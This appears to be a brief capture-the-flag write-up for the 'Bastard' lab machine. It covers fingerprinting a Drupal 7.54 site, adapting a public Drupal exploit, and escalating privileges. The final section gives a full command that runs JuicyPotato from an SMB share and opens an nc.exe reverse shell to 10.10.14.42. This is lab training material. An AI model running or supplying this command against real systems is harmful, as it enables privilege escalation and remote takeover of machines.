Bastard

Nmap Recon Results

Discovery Os System Trought the TTL

ttl = 127 -> Windows System

Recon Open Ports

Web-Services Url : http://10.129.151.188/

as can see we are dealing with the drupal cms so we will try to list the version, trying to find interesting addresses in the robots.txt

robots.txt

looking at the changelog, we can list the drupal version in this case 7.54, so our nex step is look in searchsploit or with google if that version has any vuln

Exploit

we modified the exploit in the following lines, firset we set the corret URL and let’s check if rest_endpoint was an existing path

so we realize that it does not exist, but when testing with “rest” we realize that it does exist

as we already know that the “rest” resource does exist, and that it sets the endpoint correctly, we can modify the exploit

Privesc

\\10.10.14.42\sharedfolder\JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/C \\10.10.14.42\sharedfolder\nc.exe -e cmd.exe 10.10.14.42 443 " -t * -c "{752073A1-23F2-4396-85F0-8FDB879ED0ED}"